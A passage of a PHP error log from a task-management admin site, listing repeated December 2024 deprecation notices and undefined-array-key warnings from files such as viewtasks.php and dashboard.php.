/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:26:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 10:34:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 11:29:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 11:30:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [13-Dec-2024 11:39:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 12:07:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 12:09:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 12:21:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 15:08:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 15:08:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:08:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:08:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:08:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:09:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:09:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:09:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:09:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:12:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:12:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:18:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 15:25:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Dec-2024 03:24:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Dec-2024 17:18:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Dec-2024 17:18:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Dec-2024 17:18:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Dec-2024 18:20:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 00:56:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 00:56:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 00:56:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 00:56:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 00:56:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 00:57:01 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 00:58:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 00:58:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 00:59:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:00:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:00:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:01:10 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:01:11 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:01:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:02:03 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:02:29 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:02:47 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:03:02 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:03:16 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:03:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:11:42 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:12:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:12:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:13:46 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:13:53 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:13:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:31 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:44 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:14:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:02 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:15 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:45 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:51 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:16:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:17:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:17:28 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:18:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:19:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:19:33 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:19:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:20:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:20:31 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:20:37 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:21:55 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:12 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:34 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:41 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:22:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:23:03 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:23:22 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:24:24 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:36:08 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [18-Dec-2024 01:37:26 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/ongoingtasks.php on line 19 [18-Dec-2024 01:52:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 10:54:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 10:54:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:54:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 10:54:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:54:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Dec-2024 10:58:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 10:58:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Dec-2024 10:58:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to 